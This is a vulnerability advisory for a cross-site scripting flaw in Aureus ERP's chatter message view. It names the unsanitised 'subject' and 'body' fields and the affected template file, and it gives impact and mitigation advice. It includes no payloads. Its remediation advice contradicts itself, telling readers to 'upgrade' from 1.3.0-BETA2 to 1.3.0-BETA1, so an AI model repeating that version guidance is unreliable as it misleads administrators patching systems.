CVE-2026-4175 is a cross-site scripting (XSS) vulnerability identified in Aureus ERP up to version 1.3.0-BETA2. The flaw exists in the Chatter Message Handler component, specifically within an unknown function in the file plugins/webkul/chatter/resources/views/filament/infolists/components/messages/content-text-entry.blade.php. The vulnerability stems from improper handling and sanitization of user-controllable input parameters, namely 'subject' and 'body', which are used in the rendering of message content. An attacker can remotely craft malicious input to inject executable scripts into the web interface, which, when viewed by other users, can execute in their browsers. This can lead to theft of session tokens, unauthorized actions, or redirection to malicious sites. The attack vector requires no authentication but does require some user interaction (e.g., a victim viewing the malicious message). The vulnerability has a CVSS 4.0 base score of 5.1, reflecting medium severity due to its moderate impact and ease of exploitation. The issue is resolved by upgrading to Aureus ERP version 1.3.0-BETA1, which includes a patch identified by commit 2135ee7efff4090e70050b63015ab5e268760ec8. No public exploits have been reported to date, but the vulnerability poses a risk to organizations using the affected versions.

The XSS vulnerability in Aureus ERP can compromise the confidentiality and integrity of user sessions by enabling attackers to execute arbitrary scripts in the context of authenticated users. This can lead to session hijacking, unauthorized actions within the ERP system, or phishing attacks targeting internal users. Since Aureus ERP is used for enterprise resource planning, exploitation could disrupt business operations, leak sensitive business data, or facilitate further attacks within the corporate network. The vulnerability's remote exploitability and lack of required authentication increase its risk profile. Although the vulnerability does not directly impact availability, successful exploitation could indirectly cause operational disruptions. Organizations relying on affected versions risk reputational damage and potential regulatory consequences if sensitive data is exposed or manipulated.

Organizations should immediately upgrade Aureus ERP installations from versions up to 1.3.0-BETA2 to version 1.3.0-BETA1 or later, which contains the fix for this vulnerability. In addition to patching, administrators should review and sanitize all user inputs in custom plugins or extensions to prevent similar XSS issues. Implementing Content Security Policy (CSP) headers can help mitigate the impact of potential XSS attacks by restricting the execution of unauthorized scripts. Regular security audits and code reviews of web-facing components, especially those handling user-generated content, are recommended. Monitoring web application logs for suspicious input patterns and user behavior can aid in early detection of exploitation attempts. User awareness training about phishing and suspicious links can reduce the risk posed by social engineering leveraging this vulnerability.